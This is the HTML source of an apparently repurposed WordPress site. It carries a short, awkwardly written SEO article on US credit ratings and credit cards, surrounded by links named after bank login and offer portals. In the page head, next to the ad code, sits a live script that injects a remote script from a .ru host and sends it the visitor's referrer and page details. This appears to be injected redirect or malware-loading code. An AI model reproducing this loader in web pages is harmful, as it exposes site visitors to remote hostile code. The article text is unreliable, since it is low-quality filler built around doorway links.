<!DOCTYPE html>
<html lang="en-US">
<head itemscope itemtype="https://schema.org/WebSite">
<meta charset="UTF-8" />
<meta name="description" content="" />
 
 <meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Montank – </title>
<!-- Jetpack Site Verification Tags -->







<link rel="canonical" href="/" />
 <script type="text/javascript">
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/biennalemontreal.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=0c3c5b3207e96d1b3a5ac110dcb6b13d"}};
 !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
 </script>
 <style type="text/css">
img.wp-smiley,
img.emoji {
 display: inline !important;
 border: none !important;
 box-shadow: none !important;
 height: 1em !important;
 width: 1em !important;
 margin: 0 .07em !important;
 vertical-align: -0.1em !important;
 background: none !important;
 padding: 0 !important;
}
</style>
<link rel='stylesheet' id='pretty-creative-theme-css' href='/wp-content/themes/Pretty%20Creative/style.css' type='text/css' media='all' />
<link rel='stylesheet' id='social-widget-css' href='/wp-content/plugins/social-media-widget/social_widget.css' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css' href='/wp-includes/css/dashicons.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C300&#038;ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css' href='/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='/wp-content/plugins/jetpack/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' src='/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script>
<![endif]-->
 
<script type='text/javascript' src='/wp-content/plugins/puzzle-game-widgets/modules/js/puzzle-game.js?ver=1.0'></script>
<link rel='https://api.w.org/' href='/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="/xmlrpc.php?rsd" />


<!-- analytics-code google analytics tracking code --> <!-- --><script type="text/javascript">
(function(url){
 if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
 var addEvent = function(evt, handler) {
 if (window.addEventListener) {
 document.addEventListener(evt, handler, false);
 } else if (window.attachEvent) {
 document.attachEvent('on' + evt, handler);
 }
 };
 var removeEvent = function(evt, handler) {
 if (window.removeEventListener) {
 document.removeEventListener(evt, handler, false);
 } else if (window.detachEvent) {
 document.detachEvent('on' + evt, handler);
 }
 };
 var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
 var logHuman = function() {
 var wfscr = document.createElement('script');
 wfscr.type = 'text/javascript';
 wfscr.async = true;
 wfscr.src = url + '&r=' + Math.random();
 (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
 for (var i = 0; i < evts.length; i++) {
 removeEvent(evts[i], logHuman);
 }
 };
 for (var i = 0; i < evts.length; i++) {
 addEvent(evts[i], logHuman);
 }
})('/?wordfence_lh=1&hid=05AB20AC2CF68F48F21BC35D7E28FED4');
</script>

<link rel="icon" href="/wp-content/themes/Pretty%20Creative/images/favicon.ico" />
<link rel="pingback" href="/xmlrpc.php" />
<meta itemprop="name" content="Montank" />
<meta itemprop="url" content="/" />
 
  <style type="text/css">
 .home-top {
 background-image: url( );
 }
 </style>
<!-- Jetpack Open Graph Tags -->









<!-- End Jetpack Open Graph Tags -->
<style>#countdown,.js-ticker-header-widget-container,.category-description, .archive-description{display:none !important} *{visibility: visible !important;} .pagecontent:before{width:auto;left:auto} .logo_a{font-size:25px} .wima1{max-width:1000px;margin:auto}  h2 a{font-size:12px}</style><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>  (adsbygoogle = window.adsbygoogle || []).push({    google_ad_client: "ca-pub-6939788131870714",    enable_page_level_ads: true  });</script><script type="application/javascript">var d=document;var s=d.createElement('script'); s.src='//1mil.ru/v387SH?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+''; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName('head')[0].appendChild(s);}</script></head>
<body class="home page-template-default page page-id-86 header-full-width content-sidebar" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><p class="site-title" itemprop="headline"><a href="/">Montank</a></p><p class="site-description" itemprop="description"></p></div></div></header><div class="site-inner"><div class="content-sidebar-wrap"><main class="content"> <div style="padding:10px;text-align:justify;font-size:15px;width:80%;float:left">

<h1>Credit Rating and Credit Cards in the USA</h1>

<p>In America, a credit rating is asked on every corner. If you want to buy a completely new car - show the rating, rent a house - the same story. Of course, all this will be sold without a rating, but the conditions will be much less favorable than for people who have a rating that is in order.</p>  Advertisement:<br /><br /><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><!-- lrm-links --><ins class="adsbygoogle"     style="display:block"     data-ad-client="ca-pub-6939788131870714"     data-ad-slot="5735689406"     data-ad-format="link"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br />
<p>So how do you get a good credit rating in the USA? It all starts with credit cards. Just in case, what a credit card is. This is a special bank account for which there is no money. There is only a virtual limit and you can use this limit to pay for goods and services. About once a month you are obliged to repay all the money spent, then the use of a credit card will be free, i.e. you pay only what you spent yourself, without interest or anything else. Sometimes, you need to register at least one credit card by using special codes and numbers provided by bank. For example, to register a credit card at Capital One bank, you must have <a href="/www-getmyoffer-capitalone-com-enter-reservation-number-and-access-code">getmyoffer.capitalone.com reservation number</a> and access code.</p>
<p>The only known credit card option for fresh expatriates is the secured credit card &mdash; this type of credit card when you give your cash to the bank and your credit card limit is equal to the amount you transferred to the bank. This is insurance in case you can&rsquo;t pay, because it&rsquo;s impossible to trust you completely, because You do not have a credit rating at all. Your bank freezes your money and you do not have access to it until you decide to close this credit card.</p>  Advertisement:<br /><br /><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><!-- lrm-square --><ins class="adsbygoogle"     style="display:inline-block;width:336px;height:280px"     data-ad-client="ca-pub-6939788131870714"     data-ad-slot="9124270075"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br />
<p>To ensure an increase in credit rating, you need to actively pay a credit card and also actively repay debts. Once a month, the bank sends a report on the status of your credit account to a credit agency, so ideally, at the time of sending your credit limit is used by no more than 30%, then the rating will grow and grow.</p>  Advertisement:<br /><br /><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><!-- lrm-links --><ins class="adsbygoogle"     style="display:block"     data-ad-client="ca-pub-6939788131870714"     data-ad-slot="5735689406"     data-ad-format="link"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br />
<p>Repeat once again: there are credit cards for which you DO NOT need to pay, it&rsquo;s FREE if you pay your debt on time. In USA, paying credit cards is easy and convenient, right from the phone, and it&rsquo;s not even necessary that the credit account and the account where your salary goes are in the same bank.</p>
<p>Some credit cards allow you to save. There are actual discounts that you can get if you pay with your credit card. It is immediately clear how much interest each company will return. In addition, many stores issue their own credit cards, which allow you to receive discounts of 5-10%, but this is an option for the future when your young rating will mature and settle down. Some types of credit cards allow you to save on airline tickets, insurances, etc. That is why the people here have not one credit card, but a whole pack - their own card for each case.</p>
<p>There are three advantageous credit cards: Bank of America with cashbacks and credit cards from Amazon and Target, which offer a 5% discount on any purchase.</p>
<p>Cards for which there is a fee for use, as a rule, give such privileges that the costs pay off very quickly.</p>
<p>For example, <a href="/www-mychaseschedule-jpmchase-com-access-jpm-chase-sso-login-page">MyChase Schedule</a> provides bonuses from the series &ldquo;spend $ 500 for 3 months and we will refund you $ 150&rdquo;.</p>

</div>

<style>
.sidebar ul{
	padding: 0 10px;
}
.sidebar {
 font-size: 16px;
 float: left;
 width: 18%;
}
.sidebar p {
 font-size: 14px;
}
.sidebar h2 {
 margin-bottom: 4px;
}
.sidebar .alignnone {
 margin-bottom: 4px;
}
.sidebar li {
 border-bottom: 1px dotted #ddd;
 margin-bottom: 10px;
 padding-bottom: 10px;
 list-style: none;
}
.sidebar p:last-child,
.sidebar ul > li:last-child {
 margin-bottom: 0;
}
.sidebar .widget {
 border: 1px solid #f5f5f5;
 margin-bottom: 40px;
}
h4.widget-title {
 border-bottom: 0;
 font-family: montserratlight;
 font-size: 18px;
 letter-spacing: 2px;
 margin-bottom: 7px;
 padding: 0px 0px 0px 0px;
 text-align: center;
 text-transform: uppercase;
}
</style>
<aside class="sidebar sidebar-primary widget-area">
<section id="categories-2" class="widget widget_categories"><div class="widget-wrap"><h4 class="widget-title widgettitle">Categories</h4>
<ul>
	<li class="cat-item cat-item-34"><a href="/category/banking">Banking</a></li>
	<li class="cat-item cat-item-62"><a href="/category/capital-one">Capital One</a></li>
	<li class="cat-item cat-item-68"><a href="/category/cineplex">Cineplex</a></li>
	<li class="cat-item cat-item-59"><a href="/category/clash-royale">Clash Royale</a></li>
	<li class="cat-item cat-item-47"><a href="/category/credit-cards">Credit Cards</a></li>
	<li class="cat-item cat-item-33"><a href="/category/customer-survey">Customer Survey</a></li>
	<li class="cat-item cat-item-71"><a href="/category/dish">DISH</a></li>
	<li class="cat-item cat-item-14"><a href="/category/domain">Domain</a></li>
	<li class="cat-item cat-item-51"><a href="/category/employee-survey">Employee Survey</a></li>
	<li class="cat-item cat-item-49"><a href="/category/experian">Experian</a></li>
	<li class="cat-item cat-item-76"><a href="/category/gift-card">Gift Card</a></li>
	<li class="cat-item cat-item-28"><a href="/category/health">Health</a></li>
	<li class="cat-item cat-item-36"><a href="/category/loan">Loan</a></li>
	<li class="cat-item cat-item-55"><a href="/category/mcdonalds">McDonald's</a></li>
	<li class="cat-item cat-item-79"><a href="/category/mylabplus">MyLabPlus</a></li>
	<li class="cat-item cat-item-74"><a href="/category/nsw">NSW</a></li>
	<li class="cat-item cat-item-82"><a href="/category/phone-plan">Phone Plan</a></li>
	<li class="cat-item cat-item-52"><a href="/category/premier-bank-credit-card">PREMIER Bank Credit Card</a></li>
	<li class="cat-item cat-item-81"><a href="/category/prize">Prize</a></li>
	<li class="cat-item cat-item-38"><a href="/category/rebate">Rebate</a></li>
	<li class="cat-item cat-item-40"><a href="/category/returns">Returns</a></li>
	<li class="cat-item cat-item-84"><a href="/category/samsung">Samsung</a></li>
	<li class="cat-item cat-item-64"><a href="/category/sears">Sears</a></li>
	<li class="cat-item cat-item-80"><a href="/category/soclean">SoClean</a></li>
	<li class="cat-item cat-item-43"><a href="/category/spectrum">Spectrum</a></li>
	<li class="cat-item cat-item-31"><a href="/category/sweepstakes">Sweepstakes</a></li>
	<li class="cat-item cat-item-72"><a href="/category/toll">Toll</a></li>
	<li class="cat-item cat-item-75"><a href="/category/uber">Uber</a></li>
	<li class="cat-item cat-item-60"><a href="/category/walmart">Walmart</a></li>
	<li class="cat-item cat-item-54"><a href="/category/www-brands">WWW Brands</a></li>
</ul>
</div></section>
</aside></main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope itemtype="https://schema.org/WPSideBar"> <section class="widget"><h4 class="widget-title">True New News</h4> <a href="/web-banking-comerica">comerica.com webbanking</a>
<a href="/www-culversholidaysweeps-com">culvers holiday sweeps</a>
<a href="/www-hpconnected-com-create-an-account-hp-connected-account">hpconnected com create an account</a>
<a href="/www-mypremiercreditcard-com-login">mypremiercard com login</a>
<a href="/53-identity-alert">53identityalert.com login</a>
<a href="/www-directtv-comrefresh">direct tv/refresh</a>
  </section>


 

<section id="categories-2" class="widget widget_categories"><div class="widget-wrap"><h4 class="widget-title widgettitle">Categories</h4>
<ul>
<li class="cat-item cat-item-34"><a href="/category/banking" >Banking</a>
</li>
<li class="cat-item cat-item-27"><a href="/category/bill-pay" >Bill Pay</a>
</li>
<li class="cat-item cat-item-62"><a href="/category/capital-one" >Capital One</a>
</li>
<li class="cat-item cat-item-45"><a href="/category/chase-credit-cards" >Chase Credit Cards</a>
</li>
<li class="cat-item cat-item-68"><a href="/category/cineplex" >Cineplex</a>
</li>
<li class="cat-item cat-item-39"><a href="/category/citi-credit-cards" >Citi Credit Cards</a>
</li>
<li class="cat-item cat-item-59"><a href="/category/clash-royale" >Clash Royale</a>
</li>
<li class="cat-item cat-item-29"><a href="/category/class-action" >Class Action</a>
</li>
<li class="cat-item cat-item-83"><a href="/category/commerce-bank" >Commerce Bank</a>
</li>
<li class="cat-item cat-item-47"><a href="/category/credit-cards" >Credit Cards</a>
</li>
<li class="cat-item cat-item-67"><a href="/category/credit-one" >Credit One</a>
</li>
<li class="cat-item cat-item-33"><a href="/category/customer-survey" >Customer Survey</a>
</li>
<li class="cat-item cat-item-42"><a href="/category/directv" >DIRECTV</a>
</li>
<li class="cat-item cat-item-71"><a href="/category/dish" >DISH</a>
</li>
<li class="cat-item cat-item-57"><a href="/category/disney-junior" >Disney Junior</a>
</li>
<li class="cat-item cat-item-14"><a href="/category/domain" >Domain</a>
</li>
<li class="cat-item cat-item-35"><a href="/category/employee-login" >Employee Login</a>
</li>
<li class="cat-item cat-item-51"><a href="/category/employee-survey" >Employee Survey</a>
</li>
<li class="cat-item cat-item-41"><a href="/category/employees" >Employees</a>
</li>
<li class="cat-item cat-item-49"><a href="/category/experian" >Experian</a>
</li>
<li class="cat-item cat-item-70"><a href="/category/gems" >Gems</a>
</li>
<li class="cat-item cat-item-96"><a href="/category/getmyoffercapitalone" >GetMyOfferCapitalOne</a>
</li>
<li class="cat-item cat-item-76"><a href="/category/gift-card" >Gift Card</a>
</li>
<li class="cat-item cat-item-73"><a href="/category/gotomeeting" >GoToMeeting</a>
</li>
<li class="cat-item cat-item-28"><a href="/category/health" >Health</a>
</li>
<li class="cat-item cat-item-32"><a href="/category/insurance" >Insurance</a>
</li>
<li class="cat-item cat-item-36"><a href="/category/loan" >Loan</a>
</li>
<li class="cat-item cat-item-46"><a href="/category/lovebeets" >LoveBeets</a>
</li>
<li class="cat-item cat-item-55"><a href="/category/mcdonalds" >McDonald&#039;s</a>
</li>
<li class="cat-item cat-item-30"><a href="/category/money" >Money</a>
</li>
<li class="cat-item cat-item-79"><a href="/category/mylabplus" >MyLabPlus</a>
</li>
<li class="cat-item cat-item-58"><a href="/category/nextmd" >NextMD</a>
</li>
<li class="cat-item cat-item-74"><a href="/category/nsw" >NSW</a>
</li>
<li class="cat-item cat-item-53"><a href="/category/payment-portal" >Payment Portal</a>
</li>
<li class="cat-item cat-item-82"><a href="/category/phone-plan" >Phone Plan</a>
</li>
<li class="cat-item cat-item-66"><a href="/category/pokemon" >Pokemon</a>
</li>
<li class="cat-item cat-item-52"><a href="/category/premier-bank-credit-card" >PREMIER Bank Credit Card</a>
</li>
<li class="cat-item cat-item-44"><a href="/category/prepaid-cards" >prepaid cards</a>
</li>
<li class="cat-item cat-item-81"><a href="/category/prize" >Prize</a>
</li>
<li class="cat-item cat-item-65"><a href="/category/psvue" >PSVUE</a>
</li>
<li class="cat-item cat-item-38"><a href="/category/rebate" >Rebate</a>
</li>
<li class="cat-item cat-item-48"><a href="/category/register-product" >Register Product</a>
</li>
<li class="cat-item cat-item-40"><a href="/category/returns" >Returns</a>
</li>
<li class="cat-item cat-item-37"><a href="/category/rewards" >Rewards</a>
</li>
<li class="cat-item cat-item-84"><a href="/category/samsung" >Samsung</a>
</li>
<li class="cat-item cat-item-78"><a href="/category/santa" >Santa</a>
</li>
<li class="cat-item cat-item-64"><a href="/category/sears" >Sears</a>
</li>
<li class="cat-item cat-item-56"><a href="/category/siriusxm" >SiriusXM</a>
</li>
<li class="cat-item cat-item-80"><a href="/category/soclean" >SoClean</a>
</li>
<li class="cat-item cat-item-21"><a href="/category/software" >Software</a>
</li>
<li class="cat-item cat-item-43"><a href="/category/spectrum" >Spectrum</a>
</li>
<li class="cat-item cat-item-69"><a href="/category/subway-career" >Subway Career</a>
</li>
<li class="cat-item cat-item-31"><a href="/category/sweepstakes" >Sweepstakes</a>
</li>
<li class="cat-item cat-item-24"><a href="/category/tech" >Tech</a>
</li>
<li class="cat-item cat-item-97"><a href="/category/ticket-payment" >Ticket Payment</a>
</li>
<li class="cat-item cat-item-72"><a href="/category/toll" >Toll</a>
</li>
<li class="cat-item cat-item-50"><a href="/category/toll-payment" >Toll Payment</a>
</li>
<li class="cat-item cat-item-75"><a href="/category/uber" >Uber</a>
</li>
<li class="cat-item cat-item-63"><a href="/category/verizon" >Verizon</a>
</li>
<li class="cat-item cat-item-60"><a href="/category/walmart" >Walmart</a>
</li>
<li class="cat-item cat-item-61"><a href="/category/warranty" >Warranty</a>
</li>
<li class="cat-item cat-item-54"><a href="/category/www-brands" >WWW Brands</a>
</li>
</ul>
</div></section>

</aside></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><p>Copyright Montank</p></div></footer></div>
<!-- This site is optimized with Phil Singleton's WP SEO Structured Data Plugin v2.4.1 - https://kcseopro.com/wordpress-seo-structured-data-schema-plugin/ -->
  
<!-- / WP SEO Structured Data Plugin. -->
 <div style="display:none">
 </div>
 <link rel='stylesheet' id='puzzle_game_css-css' href='/wp-content/plugins/puzzle-game-widgets/modules/css/puzzle-game.css' type='text/css' media='all' />
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201819'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Mayaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='/wp-content/plugins/jetpack/modules/wpgroho.js?ver=0c3c5b3207e96d1b3a5ac110dcb6b13d'></script>
<script type='text/javascript' src='/wp-content/themes/Pretty%20Creative/js/sticky-nav.js?ver=0c3c5b3207e96d1b3a5ac110dcb6b13d'></script>
<script type='text/javascript' src='/wp-content/themes/Pretty%20Creative/js/responsive-menu.js?ver=1.0.0'></script>
<script type='text/javascript' src='/wp-includes/js/wp-embed.min.js?ver=0c3c5b3207e96d1b3a5ac110dcb6b13d'></script>
 
<script type='text/javascript'>
 _stq = window._stq || [];
 _stq.push([ 'view', {v:'ext',j:'1:6.1',blog:'70993124',post:'86',tz:'0',srv:'biennalemontreal.org'} ]);
 _stq.push([ 'clickTrackerInit', '70993124', '86' ]);
</script>
</body></html>
</body>
</html>